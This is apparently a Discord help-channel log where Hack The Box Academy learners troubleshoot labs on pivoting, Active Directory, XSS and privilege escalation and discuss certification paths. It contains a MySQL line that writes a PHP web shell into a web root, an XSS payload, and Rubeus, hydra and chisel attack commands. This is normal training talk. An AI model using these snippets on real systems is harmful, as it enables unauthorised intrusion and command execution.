#modules
yes
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
how did you guys answer this question cuz i cannot find the flag on home page on the web server
there is only index.html
page
i reset the target see what happens
what module and section is this?
did you check the source code / enumerate the web server?
the pivoting module is like 90% following what they show you exactly ¯\_(ツ)_/¯
no flag XD
yes i did
hang on i'm redoing the lab for you
It's this module right? https://academy.hackthebox.com/module/158/section/1425
And you're doing proxy chains to the internal webserver yes?
yeah
This one 172.16.5.135:80
127.0.0.1:9050 ... 172.16.5.129:80 ... OK
Hello guys, I am new to the system and I can't tell why these two answers are marked as incorrect
Did you check the hint. Sometimes they're picky about the answer
i should have waited for the nmap scan to end
Yes, I did. I actually followed the pattern
okay i figured it out @orchid pine .. sorry that took so long i hate rpivot...
dm and i can help you further
./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt
i restarted the server
you can chain the -c onto the first lot of switches with the first one.
The second you need to do the whole command sudo tcpdump etc.
i found 2 subdomain with dnsenum
but subbrute is just hanging like this for over 5 minutes now
try -v? can also use -c to increase threads
rejected nameserver
Did you put the ip in resolvers.txt
yes
And it should really be the only thing in there
just that 1 ip? the other two that i found?
attacking DNS
i found two subdomains with dnsenum on two different ips
That's irrelevant, you're tasked with finding the subdomains, period
One of them will have the answer
you shouldn't have to dive deep
FUGE
You OK kid? Do you need a stable figure in your life?
Like I'm genuinely curious how many people you randomly dmed
Anyone know how to use the open VPN I'm new to htb
just follow the provided vpn instructions
Ight
MARCIELEE DON'T HURT ME PLEASE
can someone ban this kid
SORRY
Just kindly fuck off :)
how do i install linux
what, don't you know the difference between your green, light green, other light green, and tealish green?
oh and the other other light green
i said mb
^ gonna have this shit fixed as it's ridiculous
Tbh I think the mod/admin/staff should be in a separate color pool from htb rank
i thought it's a rank btw
it was a joke, just ribbing ya, no worries
mostly making fun of all the slightly diff green roles
^
ig just adding a mod logo with the name it can be much better
i did just help someone with the same issue with the automated tool, but doing it manually worked just fine for him, maybe you can try doing this manually
If you are as successful with it as with DNS, better leave it alone 🤪
Do you still need help?
dont overthink
is it an unrealistic goal to be able to do insane or hard level HTB Main Platform boxes independently in a few years?
I don't think so.
totally feasible , always depends on individual
but your statement is not close to unrealistic
a machine that is declared as “insane” can be easier than a “medium” for some people, depending on their knowledge about the whole process to solve it
just start learning and if you keep working day by day and step by step, in 2-3 years you can be quite good
as happens in every field of knowledge
RafaJurado is right on this, it completely depends on you and which box you do. E.g. for me the new Rebound box isn't that hard because i'm familiar with the core components of that box, but for something like the Response box where you have to create a fucking ssh key out of a screenshot there is no chance my dumb ass can do that, even though both boxes are on the same level
Guys how did i get 400 cubes overnight?😆
Cbbh grants you cubes upon completion? Some updates? May be some modules became cheaper?
student and annual plans unlock the modules
did you refer a friend or forgot to cancel a subscription?
Did you do the Intro to Assembly module earlier? I think this module used to cost 500 cubes, now only 100
Ok. Does that mean I could be good at HTB Academy, HTB Main Platform, and four or five types of hacking as taught on Pentester Academy?
Oh yes i did. That must be it. Thanks
it means that there is nothing unrealistic or impossible in a learning context
What I really mean is I want to be good at several types of hacking and you are saying that can be done in 2-3 years. How is that possible? I guess if I work super hard I believe it's possible, but do people ever actually do that?
all i can say is that people that are super good at 1 field are better paid xD
ok thanks
dont try to learn everything
so better to just get good at Hack the Box. ok
HTB is 1 source of information, its a practice and learning application
Why do people tell me that most penetration testers have several areas of hacking they practice?
just start learning and you will discover what you like most
ok
some people tell me to specialize but other people say every serious pentester is familiar with, for-example, hacking wifi networks
it can be lot of different things tho, from Offensive to Defensive to non-technical stuff like Risk Management and governance
yes you have to know the fundamentals and basics
but as i said, Red Teamers are the most paid and they know a lot about specific niches
(in offensive part)
Ok yes. I want to know the fundamentals and the basics of many things but be good at web application hacking, social engineering, and OSINT.
well, then go ahead start learning and then try to learn a lot about web pentesting
is Hack the Box a good platform for web pentesting?
for sure, but also check Portswigger labs
I'm starting with CPTS just to learn fundamentals. I'm thinking between CPTS and CBBH
Best content related to black box web pentesting
is BSCP
but CBBH is super good starting point
nice
finished it now on final section of Intro to Nmap module
do CBBH path before CPTS
because web
ok true
also a lot of CBBH modules are also in CPTS' one
its like completing both at the same time
Ya and I want to start bug bounties anyways. Ya I know and vice versa.
web pentesting is fundamental nowadays
So CBBH is more fundamental than CPTS?
not more fundamental
this isn't a bad choice if you have some free time to do it
just necessary to know xD
every company who is going to request an offensive pentest will have a web app
or several ones
also bug bounty programs are a good source of income
Aren't bug bounty programs very hard to make a good income on unless you are the best?
they are
that's what I keep reading
np ! 
I will do CBBH first then ya. I will just finish this Nmap module first and shit but ya good idea.
Then can come back to finish CPTS
will Nmap be useful for CBBH?
go on, im working on it if u need smth we are around
thanks
Can I dm you? I’m stuck too
do you need help?
hi quick question
is Nmap useful for CBBH?
or will I have to relearn it?
I almost completed the Nmap module that's why
not too big of a deal but I thought I would ask
nmap is a port scanner basically, with a lot of functions but not relevant to web pentesting
you're not scanning ports in a web pentest xD
it can be defined in a better way as a network discovery tool
its Lua-based scripting engine can be useful sometimes
but i'd rather learn BurpSuite, ffuf and other tools more related to Web pentest
as you can see there are several categories of default scripts that can maybe be useful in a web pentest, but yea not a must to learn for CBBH path
you certainly can be if you're trying to find multiple webapps
if they're running on uncommon ports you mean?
the most usual way to host multiple webapps is virtual hosting, since its easier and cheaper
but yea you can find situations where a webapp is running under a random port (we've seen that in a lot of HTB machines)
Can anyone help me on this, really appreciate any help. I'm in Introduction to Python3, section Conditional Statements and Loops. The question that's killing me is the last one: What is the result of running the code in "Code block 3"?
what is the problem?
Can't find the answer to this one, but can't RUN the CODE either, it won't go through ????
why you can't run the code? You can do it even online
Don't know, for some reason it's not going through ??????? I've tried on different panels also
Well I solved it by just reading the code I'm not saying that you need to do so. Anyway you can use something like this to run Python code:
https://www.programiz.com/python-programming/online-compiler/
Ok will give it a Try THANKS
Put print in front of it but it won't go through. That ONLINE Compiler worked
At least the Online compiler worked thanks
GOT IT , THANK YOU AUTOM4il , OWE you A CASE OF BEER
YES SIR THANKS
The NFS nohide option is giving me hard time. I cannot understand what it means. Googling didn't help.
https://academy.hackthebox.com/module/112/section/1068
which module is?
Hello Guys, I'm taking CREST CRT next month. Any suggestions/Advices? Could you please message me in a private chat.
https://discord.com/channels/473760315293696010/482659243456200705 I believe this would be the best place to ask this.
I'm unable to access that link
Verify your account in #welcome
I am currently doing the network enumeration with nmap module -> service enumeration and I'm on the question of " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I have performed a full port scan and found all open ports along with their services. However even after performing || nc -nv *target_ip* *port* ||on every single port while having || sudo tcpdump -i tun0 host 10.10.15.173 and 10.129.183.0 ||open in a different terminal window, I fail to find anything resembling a flag. Can anyone advise? I made sure to wait at least 1 minute per each nc command before moving on to the next
Note that I am receiving some logs in my tcpdump when I ||nc -nv *target_ip* *service_port*|| but I dont get any sort of flag
what the fuck doing the same thing thrice worked, I hate it here
Then submit the error to #858470491676737536 with a suggested fix
Hi there 🙌🏻 I'm interested in taking on the Penetration Tester Job Role Path Training on the platform. Is there any cost or fees involved?
the exam itself costs $210
then you have to unlock the modules which does cost money. cheapest path is if you’re a student, which unlocks everything (while subscribed) for $8/mn
it’s still cheaper than other certs on the market
Yeah.. Thanks 🙏🏼 for student, means you need a “edu” mail domain?
so if you sign up with a .edu you should have access to that tier automatically, if not you’ll have to message support to see if it’s a valid college/university.
Alrite. Thanks for the infos. 🫡💯
Hello everyone, i have a question about a windows system, what is the difference between lsass and system/sam? Why can't i read the hash of a user that is not logged in from lsass, but in system/sam i can? Please help me!
I'm on Attacking Common Services, attacking FTP, got a username and password and a flag, but none of those are accepted as answers, any chance I could DM someone to double check so I don't spoil things here?
somehow I got the details for the next section on SMB instead...
nevermind, I got it
can somebody help with how to get the CLSID for JuicyPotato running the script \testclsid.bat in Windows Privilege Escalation Skills Assessment - Part I. i don't get any output
Hi everyone, im doing the Linux Privilege Escalation module and doing the Logrotate box. I know what i need to do but the exploit rarely works. Nothing gets written in /etc/bash_completion.d/ and if it does it's usually an empty file that i can't write anything into. Anyone else had a similar problem?
I was able to get the flag using the manual approach. I'm not sure what I did differently to get it to work. I just tried it three times, and it finally worked. I think maybe I had too many tabs in the XML code I added to the POST request. In any case, thanks for your help!
im starting to see some of these boxes just don't work correctly
im trying to SSH into a machine that the problem is telling me to and it keeps saying permission denied
haven't even entered the password yet
the error you get should be telling you what the issue is
are there more resources for ctf style games with pcaps i can analyze? the network analysis module was fun
I did the lab earlier today, it works as it should
you could look at the forensic challenges on HTB's main platform🧐 i know some of those involve pcaps
oooh cool thanks
do you want to dm me? we can try to diagnose what's going on
yA
Hi! Guys! i am doing the Attacking Common Services Easy lab. I managed to get user and password, logged into mysql, found the cve to upload a shell.
SELECT "<?php system($_GET[‘cmd’]); ?>" into outfile "C:\xampp\htdocs\1.php";
i used this command to upload it
i can't access the shell though
what did i do wrong?
U need to escape the back slash
////
I did the exact same thing but still am not able to find Kira's password. I mutated Kira's password from the hint using hashcat, and ran hydra -l Kira -P kira-mut.txt ftp://10.129.188.235 -t 48. Can you give me a tip pls
recheck your c: syntax
C:\\xampp\\htdocs\\backdoor.php';
What web shell did you use?
thx
I use mysql and it works for me
Try dir C:\
i'm sure the mysql way works, but like i said it's not necessary if it's not working
Idk maybe there's other ways
there is 😉
not working
for disregard, operator error
Web Attacks - Blind Data Exfiltration I got the flag but academy isn't accepting it. Checked for spaces in the answer field etc. is it a decoy flag or a bug maybe?
had the wrong file path in my code
Are you sure you’re uploading to the right path?
Hello everyone, please help me with the skill assessment in the Kerberos attack module. I can't solve the last question. I tried all the variants, but I either get access denied or the plan is not working. I realized that this is Unconstrained Delegation through the computer and that I need to somehow use the jake ticket. When I request a service ticket on cifs, I receive it, but as I said, I am denied access. The hint that came with the task was more misleading. Please tell me what I'm doing wrong or which way to think.
1. Rubeus.exe monitor /interval:5 /nowrap
2. Rubeus.exe asktgs /ticket:j*** /service:cifs/dc01.il.loc /ptt
3. renew
4. dir \\dc01\c$ <= access is denied
yes.
on the webpage FAQ it says xampp/htdocs
did you check your c: syntax?
i did i tried it like 6-7 different ways
am i this stupid tell me?
or what am i not seeing
Try / instead of \ maybe
tried that also
I think your single quotes around cmd are messed up too
Need '
In #858470491676737536 too
Maybe there's other paths
Dealt with.

@fading oracle did this work?
i tried it with both single and double quotes
The single quotes in your screenshot aren’t good
You use ‘ instead of '
Got it?
Alright, let me know
No you're meant to upload to the web root on this one
Was it a quote issue?
yes i think because i copy pasted it from a CVE

so, who thinks that he is a potato and will face the same problem, here is an instruction for you, do not use the C drive and you are doing everything right
You need the secret share, you don’t have access to c
so, for the second time, pass-the-hash with xfreerdp works only from the pwnbox for me, does anyone have any ideas as to why that might be?
Sorry, I didn’t see your question
Is the Linux attack host given in the active directory module joined to the domain?
exactly, I already guessed)
🤘🏽
You could’ve also checked with psexec
It would’ve shown the available secret share
what error do you get when you xfrdp from vpn?
cool, I'll try it, thanks)
it just demands the password anyway even though I've added the required registry key
but works without issue from the Pwnbox
Try not running it as root
thanks for the suggestion, this is what I get
I had that issue with xfreerdp before I forget how I permanently fixed it
Ik you can set the $DISPLAY variable to 1 which should work
strange, followed the steps but keep getting the error
Hi, Anyone can help me with the Skills assessment file upload
so far,
I have found the source code of upload.php file with XXE attacks. stuck on upload the php code.
Display name could be different. Also, just in case, what machine are you using?
Kali Linux VM
yeah, I'm googling and trying to find a solution
Could also be a case of uninstall/reinstall
Because the password portion really should pop up in gui
if you want to dm i can help 🙂
Thanks
Hi guys I have a problem with the module named "Introduction to assembly language"
I'm at the functions section, I tried to run the code with this given command
nasm -f elf64 functions.s && ld functions.o -o functions -lc --dynamic-linker /lib64/ld-linux-x86-64.so.2 && ./functions
But when I try to open it with gdb, I get this error: functions.s:(.text+0x23): undefined reference to "printf"
how can I fix that ?
oh well, can't find a fix, hope that doesn't screw me over on the exam
So how did you manage to do the skill assessments? 😅
it works on the pwnbox, I just really hate using it
Did you try reinstalling xfreerdp
now I did, it resulted in extra errors 🥲
unless someone knows first-hand how to fix it, it's best I not experiment anymore in case I end up not being able to use it at all
@hallow kiln is your system updated?
xD damn
hello everybody, I'm doing the chisel exercise in the Pivoting module, and I'm receiving this error message on the jump host:
can I ask you how you solved it? did you have to download the lib file and then upload it to the jump host, or what?
if you do xdpyinfo what do you get?
ah you did it
i solved it someway for an INE lab
maybe try from Parrot OS
yup, I keep it updated
What error does it give now
it works from the Pwnbox, I'm not ditching Kali for Parrot cause of one tool though
from my experience Kali Linux has given me a lot of problems with several tools 🤷
all of this before logging in normally with a password, same as before when trying to pass the hash
Can you restart your machine, and reset the target?
I had the same issue with another target a day or so ago, it's not that
I've heard Parrot can be pretty buggy too tbh, it's all personal preference in the end
I doubt that
it’s weird that for some people Kali is not viable and Parrot is, and vice versa
this thread has some interesting posts
btw do you have a desktop installed?
Active Directory Terminology section in intro to AD is infinite
has this type of error happened to anyone?
you are trying to run a go file btw
read the documentation at least
one option is to compile it yourself go build <main go file> -ldflags="-s -w"
flags are for size reduction
or download compiled binaries according to the system
yes, I did
done, also upx brute chisel
now the binary is 3.3MB
but you can’t run a go file
it's a compiled language
./chisel if you run it you should be getting the help panel
one sec, when you say "Use the binary obtained" you mean just move the chisel file to the jump host, not the whole folder?
do you even know what a compiled language is
go
That wasn't the question lol
i think it has to be really well explained within the module
that you have to upload the binary
and run there in client mode
^
as usual read better 🤣
ok, let's see what I'm doing wrong or misunderstanding in the documentation:
```
Cloning into 'chisel'...
remote: Enumerating objects: 2269, done.
remote: Counting objects: 100% (107/107), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 2269 (delta 50), reused 66 (delta 28), pack-reused 2162
Receiving objects: 100% (2269/2269), 3.50 MiB | 5.32 MiB/s, done.
Resolving deltas: 100% (1075/1075), done.
2.- cd chisel
go build
go build -ldflags="-s -w"
du -hs chisel
7.9M chisel
3.- upx brute chisel
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: brute: FileNotFoundException: brute: No such file or directory
8257536 -> 3309780 40.08% linux/amd64 chisel
Packed 1 file.
4.- du -hs chisel
3.2M chisel
5.- scp chisel ubuntu@10.129.183.15:~/
ubuntu@10.129.183.15's password:
scp: /home/ubuntu//chisel: Is a directory
```
just share it with a http server
ok.
php -S 0.0.0.0:80
You need to do -r btw to scp a directory
I know, but if i move the whole directory it's not working either
hmm ok., let me try it
Also your upx failed
why?
Read what you sent and you tell me
Your upx is reading "brute" as a file
Which is giving the file not found error
ok. looking in the ippsec video, he got the same message
and got a similar compression ratio
you have to run it as a flag
upx --brute chisel
ippsec is human and as human he can be wrong
you got one chisel file that weighs 3.2M, just upload it to the pivot machine 😭
it isn’t that difficult you got it
^
it's not....
i followed you....
now I'm receiving this error message:
```
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
```
what is WEB01?
Try downloading an older version of chisel
what is the architecture of WEB01 machine?
Linux WEB01 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
v1.9.1 is the latest, what is your recommendation?
An older version idk which exactly
ok
how do you get HTB pro hacker role inside this server?
also post it in erratum
By doing boxes
WEB01 needs to be updated
in this server
Read #welcome
👍
Can you show please which version and type of chisel did you install?
I mean sometimes versions like arm64 don't work properly
I downloaded 1.8.1 and works, thanks btw
which should work
Great
if you build it static, the binary does not rely on system libraries
good enough
the module route you to https://github.com/jpillora/chisel and the version is 1.9.1
Got you, in my case it did work🙂
coz probably you used 1.9.0 or earlier one
the module just needs an erratum
the 1.9.1 is quite young
ok, did you apply the go build -ldflags="-s -w" and then upx brute chisel ..???
from Aug 23rd
No, 1.9.1
Yeah
just compile it statically
No idea
Wait a while, which module is it?😂
Pivoting, tunneling and port forwarding
Okay, if this one, it was always working
1.9.1
cant be 🤷
I was doing pivoting not a long time ago...
maybe there are different instances of WEB01
ok, my question is, did you have to reduce the binary size or just copy it to the jump host?
there isn't
golang changed how binaries are built
and now people need to learn how to statically compile
No, just scp
Yeah, the amd64
ok, you moved the original binary, understood
the compression does not matter
idk just a couple months back is when I started seeing everyone complain about GLIBC when transferring gobins to targets
the one from releases is compressed
learn to statically compile though and youll be fine for just about any tool, not just chisel
the releases one is from Aug 23rd
I was doing the same stuff which was mentioned in password attacks module, but with the newest version of chisel
Don't know if this is the right channel to ask but
Would you advise beginner users (like myself) to use guided mode when doing machines?
sweet
how is it working for one guy and not for another
Life is strange)))
Don't know, don't care. It's a very solvable problem with three seconds of google
it should not work for T3p3s if WEB01 is the same machine
CGO_ENABLED=0 go build -ldflags="-s -w -linkmode 'external' -extldflags '-static'"
or the releases one is statically compiled
You're thinking way too hard about this
i want to understand how it works for one person and not for another
Here's a hint: someone fucked up
HAJAJAJA
It's not worth losing sleep over
there's a correct known solution to the issue
let's continue with our day
exactly
Madfox can i DM you with an issue i'm having with pivot module?
what did u use to bypass the error
I downloaded an older version of chisel and moved to the jump host, BUT I'm gonna try it with the latest release as well
Update, I think it cannot be opened with gdb. We use C functions in a .asm or .s file, so gdb is lost because we use printf inside an ASM file
I think that the only way to execute it is with the given command. But we cannot inspect the memory assignments.
Why do I think that? Because when I inspect the executable file with GDB I don't get any errors and I can inspect the executed code
can someone tell me what im doing wrong
yes u can
what, i should run the server on the attack host?
as usual in pivoting xD
wait
im confused
Running the Chisel Server on the Pivot Host
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
2022/05/05 18:16:25 server: Fingerprint Viry7WRyvJIOPveDzSI2piuIvtu9QehWw9TzA3zspac=
2022/05/05 18:16:25 server: Listening on http://0.0.0.0:1234
this is on academy i need to start the server on the pivot
well idk then
but it is really weird because the client is the one who redirects the traffic
im so confused right now
and proxychains is ALWAYS on the same machine as the server
or the module is wrong or you are missing something
I guess the server provides the traffic to client
the server just listens
cuz he is the server in this situation
i’ve always done server in my attacker machine and client on pivot
Then you need reverse mode activated
yea
Also provide fingerprint on client
but reverse flag in chisel is for reverse forwarding
iirc
i dont use chisel since i discovered ligolo-ng
Summary Recently I’ve completed the Hack The Box Dante Pro Labs and really enjoyed it. One of the most crucial pieces to being successful in the lab is understanding how to pivot properly. So I wanted to write up a blog post explaining how to properly pivot.
Yeah but if we run server on attacker , we need it to be in reverse forwarding
--reverse, Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
this?
Yea
Idk
i see you did not specify a port in the client
Hi, can you give me a hint please. I am having same problem
Resolved?
it's missing the port in the client, such as PORT:socks
It’s because that 5**** port is just an arbitrary port which is selected at random for a connection
the connection established: 2023/09/27 20:03:22 server: session#2: Handshaking with 10.10.15.56:36938...
Not the port for your socks.
The port for connecting to socks should have showed in your client output
Not in server.
In your case, it didn’t (not sure why)
But by default chisel chooses 1080 and you could have seen it with ss tulpn command
I believe you also have an option to choose a port for your socks proxy
ok then
Yup
It didn’t show but it started socks on 1080
there is a difference between the port the proxy uses to forward the packets and the one used to establish the connection
┌──(shadowalker㉿kali)-[~]
└─$ ./chisel_1.8.1_linux_amd64 client -v 10.129.250.155:1234 socks
2023/09/27 15:03:21 client: tun: Bound proxies
2023/09/27 15:03:21 client: Handshaking...
2023/09/27 15:03:22 client: Sending config
2023/09/27 15:03:22 client: tun: SSH connected
ofc
i told you the syntax
PORT:socks
instead of just socks
and declare the same PORT in proxychains conf
A communication established is just a handshake (tcp in this case) it chooses a random port for that establishing the connection. Tldr yes.
now i understand
thank you guys
for making things clear for me
the proxy is using another port to forward the traffic to the server side
thats the intention behind this server
thx
is Nmap useful for bug bounties? I am finishing Nmap module but I just want to make sure I didn't waste my time if I'm switching to finish CBBH first before doing rest of CPTS
because I don't want my time learning Nmap to be wasted
just subscribed to HTB Main Platform so I guess I can practice Nmap there even in web application heavy boxes right?
anyways you’re gonna need the nmap module
even in the bug bounty path?
in your whole career
ok thanks
right ok I know that but I want to make sure I keep using my Nmap skills so I don't forget
and I'm scared if I switch to CBBH I will forget. However, I also want to do bug bounties
to get some real world experience and have something to put on my resume
and because I'm interested in hacking websites anyways and bug bounties let me do that legally and safely
you wont forget nmap skills
take good notes
also you do not need to know every single flag and option from nmap by heart
I have taken notes on entire Nmap module
you have Google and manuals
ok thanks
true true ok
it is ok to use google
ok cool ya
it is ok to ask questions to others
ok ya I see
finish the module and continue with cbbh
ok thanks
in cbbh we do not use nmap
Ok thanks. Would it be good to do PentesterLab on top of CBBH?
to reinforce skills?
I'm already subscribed to HTB Main Platform
so I'm just wondering
dont try to learn and use all platforms
the required knowledge for CBBH is within the HTB academy
just set a goal
for example, CBBH or CPTS
when you get it you can go for another source of knowledge, usually certifications are a good source of knowledge
ok so is doing HTB Main Platform and Academy both a bad idea? My goal for the next two years is to get through CBBH and CPTS and earn both certs
maybe to go beyond that
no but id stick to academy first
boxes challenges and tracks on the main platform are a very good way to test your knowledge
but day is limited to 24h
you cant do all
Ok, so ya point taken.
so should I cancel HTB Main Platform subscription?
because I just subscribed
maybe just focus on CBBH > CPTS > more advanced Academy stuff?
if you are not using it ofc xD
ok thanks
using it or not is your choice
maybe you can save some hours a day to practice retired machines or challenges idk
it is something personal
Ok, but since you recommend just focusing on Academy I think I will do that for the time being
the active boxes are always free so you don’t need a VIP subscription, unless you want to do retired content or early access to endgames
yyy
i guess VIP always gives Pwnbox access so if you’re traveling or don’t have a dedicated hacking machine / vm that’s nice too
what is your goal?
cbbh and cpts, just stick to academy o.O
also cert exams are NOT a CTF
boxes usually have another approach
I guess my goal for next year and a half is to earn both CBBH and CPTS. Beyond that my long term goal for the next 2-3 years is to be able to do the hard or insane Academy stuff
like from the CREST paths tho I'm not interested in getting CREST certs
just want to practice paths to gain advanced skills
and do bug bounties
check BSCP certification
that's completely doable, but yes focus on Academy and its modules. especially if you're on a tight budget don't be paying for HTB and Academy
ok thanks
if web is your passion i’d go for CBBH and BSCP
ok thanks
focus on Academy, as i said above, all active boxes are free on HTB anyways so you can always test your skills on active content
Ok thanks
the only reason i pay VIP+ is the exclusive instances 🤣
hate when people remove stuff or randomly reset the machines
eventually I do have other hacking skills I want to learn but I think Academy + bug bounties + maybe BSCP would be good for 2-3 years. Maybe even just in 2 years. Once I'm there, if I am good with Python which I am learning, then from there I'm hoping that I could add in another area of hacking like Wireless or something, but I don't want to focus on that if it's too scattered.
I also think Academy covers what I generally need in terms of core skills.
So I'm getting good at Academy.
this is a huge plus
Then once I'm really good at HTB Academy, I'm thinking there are a few other types of hacking it would be good to know the basics of. From there I could test my skills with active boxes and, if I'm ok at it, then maybe I could add in a different platform that covers other kinds of hacking, but probably not before.
The only other platform I probably need is Pentester Academy tbh, because it covers the basics of other areas I am interested in.
But I feel like HTB Academy covers the core skills really well
then from there everything else I can learn ezpz anyways since that's most of the hard stuff
windows, linux, web
network to some extent
I also like the foundation academy provides because I feel like other stuff could flow from it
except for social engineering but I'll deal with learning that a different way just by socializing and practicing elicitation and ethical pretexting lmao
which is totally doable
i’m biased, but i’ve tried a few other websites and academies and nothing really stuck or got me as motivated as HTB Academy 🤷🏼‍♂️ perfect blend of learning and being challenged
I know. I agree. That's why I'm doing HTB Academy first in order to milk its value for web, linux, windows, networking. Then from there if I could learn basics of other stuff such as wireless hacking, network, IoT, and social engineering, that would be great.
but I don't want to spread myself thin so only basics and only after I get very good at HTB Academy
and maybe cloud hacking would be good to know
like AWS, Google Cloud, etc.
and be good at Python and C programming to help with hacking
but problem is I want to know everything (which is not realistic) so I think Academy is a more realistic focus
then in 2-3 years I'll see where I go from there
once I master academy stuff
is that a bad idea for a goal in five years?
I mean I am told I can do Academy goal in 2-3 years so then from there the next step would be to learn basics or other stuff
I know being advanced at everything is not realistic but to know some of basics of some other stuff
Hi, did you solve it? I am having the same problem, it asks me what goes after user.name in the KQL query for the field that contains the word "admin", I add admin* and I get an error
Ez
Also asking others for help with these training exercises really defeats the purpose

I knew you could do it. Asking others for help is sometimes a necessary tool as well, as you will learn in a later (almost impossible) exercise. It was made for people to learn that sometimes asking for help is the way to go.
Someone breached the 7th firewall, gotta go!
can someone explain the difference between using chisel in reverse mode and normal mode
"In the previous example, we used the compromised machine (Ubuntu) as our Chisel server, listing on port 1234. Still, there may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option."
for example imagine there is an internal web server that's only accessible from the internal network (iptables); in order to see it from your machine you have to reverse port forward it
it's like reverse and bind shells
reverse ones go from “victim” to attacker and this way they are outbound traffic which usually is less restricted than inbound
ty bro, I was thinking inside the box
we need to be the client in this situation, no?
the easier way to understand it is comparing with reverse and bind shells or with the direction of the traffic
if your machine is the client the traffic goes from your machine to the victim
which is inbound traffic, usually restricted
then we use it to bypass the restriction
That's the whole point of this channel my guy
we use it in reverse mode to reverse the direction of the traffic
which allows you to reverse port forwarding for example
can someone help me with Attacking Active Directory & NTDS.dit in Password Attacks, for the last question: "Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)". I can't copy the ntds.dit file to my local machine; every time I get this error
I'm doing the XSS Module, Phishing Lesson and having problem with the URL encoding...
So.. which part should I encode, because if I encode the whole URL I keep having issues..
you can see your payload
holyy how fun was Javascript Deobfuscation module
the double pivot
section
was not explained in a good way
anyone have a resource where I can understand this well
if you don’t understand a section/module, I would always advise rereading it once you finish the path or a few days later
i personally would recommend redoing pivoting and AD once you complete the path no matter how good you are
can anyone help with WINDOWS EVENT LOGS & FINDING EVIL mini module Get-WinEvent section?
yeah but I didn't understand the concept properly
i am skiddyphus and my boulder is green cube modules
anyone who has done the ptunnel-ng section into Pivoting module..!!!
ptunnel-ng is not running on the jump host
I tried compiling an older ptunnel-ng version and moving it to the jump host, and that didn't work either
Howdy folks! Running into an issue with the SocksOverRDP section of the Pivoting module, specifically related to Proxifier. When Proxifier is running on the initial host, it fails to route traffic from mstsc.exe correctly, and it does not appear to realize mstsc is running. Is there a common error somewhere in my setup perhaps?
I ran xsstrike.py and found '><a%0doNpOINteREnter+=+a=prompt,a()>v3dm0s as the payload
It seems I just needed the '> to be added to the JavaScript piece of code with the login form. Problem is I'm not fully understanding the output of xsstrike and how to use it..
If anyone else can help me with that I'd be thankful..
I'm talking about XSS easy module, Phishing Exercise
anyone who can give me a hint how to run ptunnel-ng into the jump host?
cuz, I did exactly what is explained in the module/section and I'm receiving a dependency error from the jump host
```
ubuntu@WEB01:~/ptunnel-ng-1.1/src$ sudo ./ptunnel-ng -r10.129.59.40 -R22
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)
```
How do I know which plugin rules to select for this nessus assessment exercise?
so I'm doing the Active Directory part, and I'm pretty sure I'm getting the answer right but it's saying wrong
What role ensures that objects in a domain are not assigned the same SID? (full name)
Relative ID (RID) Master - The RID Master assigns blocks of RIDs to other DCs within the domain that can be used for new objects. The RID Master helps ensure that multiple objects are not assigned the same SID. Domain object SIDs are the domain SID combined with the RID number assigned to the object to make the unique SID.
Hey! Is anyone able to help me with the Attacking Common Services SQL module? I literally cannot login to the SQL server no matter what I do. I am using the correct command with mssqlclient.py but am getting this error no matter what:
```
Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
```
I am seriously pulling my hair out on this one. Been about 2 hours on my own so far.
It shows you, but the jump host they provide already has pre-populated scans
I also can't scan the server with NMAP. It is blocking my pings, and with the -Pn flag it is stating the host is down. But normal pings show status as up
use the mssqlclient.py -windows-auth
I am
```
mssqlclient.py -p 1433 htbdbuser@10.129.34.59 -windows-auth
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
```
have you read the error?
Yes
have you googled the error?
Yes - From what i gathered i need to be doing exactly what i am doing.
into RDP and SOCKS Tunneling with SocksOverRDP how to fix that restriction error?
Hmmmm
That is interesting. I think i figured it out. Removing the -windows-auth actually helped.
There is another protection service running
ok., thank you
@fathom pendant do you know why is this error into ICMP Tunneling with SOCKS :
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)
?
I think you need to statically compile it. That's been stated like a dozen times in this channel
ok., could you please point me to some documentation?
Also potentially this
Google is fantastic https://github.com/utoni/ptunnel-ng
thanks
XSS module also super fun !
do we have any CSRF module/section in the academy?
i could not find
from mssqlclient help panel
windows auth requires a user in the domain btw (such as a service account)
now think a bit
Is it possible to buy a whole path at once? Let's say the BBH path costs me approx. 1300 cubes; isn't there an option to buy them directly without paying 1000 cubes this month and 500 the next one?
you can buy cubes without paying for a subscription
Hello everyone, I'm in the DOCUMENTATION & REPORTING module, Notetaking & Organization
I'm stuck on question 2
Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)
I have the answer but I'm putting it in and the format is wrong, could somebody help me?
the rdp issue is finally hitting me 🥲 😂
It's why I got used to remmina
i've tried remmina even rdp from my windows machine
F
Remmina is good only if you don't need to pass the hash
You can pth in remmina there's a section to put a hash in
Oh wait let me see
Oh my god
thanks bro
Dude I had the same reaction to finding out
guys
